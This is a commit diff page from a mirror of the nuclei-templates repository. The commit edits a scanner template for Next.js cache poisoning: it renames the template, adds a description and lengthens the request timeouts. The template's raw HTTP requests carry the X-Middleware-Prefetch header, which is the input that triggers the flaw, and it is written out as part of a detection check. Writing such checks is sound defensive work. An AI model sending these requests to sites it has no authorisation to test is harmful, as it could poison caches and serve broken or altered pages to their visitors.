daffainfo
/
nuclei-templates
mirror of https://github.com/daffainfo/nuclei-templates.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Update nextjs-middleware-cache.yaml

patch-4
Ritik Chaddha 2024-07-10 23:41:00 +05:30 committed by GitHub
parent f6b215570e
commit 0f98f845dd
No known key found for this signature in database
GPG Key ID: B5690EEEBB952194
1 changed files with 5 additions and 7 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

12
http/vulnerabilities/nextjs/nextjs-middleware-cache.yaml
View File

@ -1,9 +1,11 @@
id: nextjs-middleware-cache
info:
name: Next.js Cache Poisoning using X-Middleware-Prefetch
name: Next.js - Cache Poisoning
author: DhiyaneshDk
severity: high
description: |
Next.js is vulnerable to Cache Poisoning using X-Middleware-Prefetch.
reference:
- https://zhero-web-sec.github.io/research-and-things/nextjs-and-cache-poisoning-a-quest-for-the-black-hole
metadata:
@ -25,22 +27,18 @@ http:
- |
GET /?cb={{rand}} HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.6478.127 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
X-Middleware-Prefetch: 1
Priority: u=1
- |
@timeout: 5s
@timeout: 10s
GET /?cb={{rand}} HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.6478.127 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
X-Middleware-Prefetch: 1
Priority: u=1
- |
@timeout: 5s
@timeout: 10s
GET /?cb={{rand}} HTTP/1.1
Host: {{Hostname}}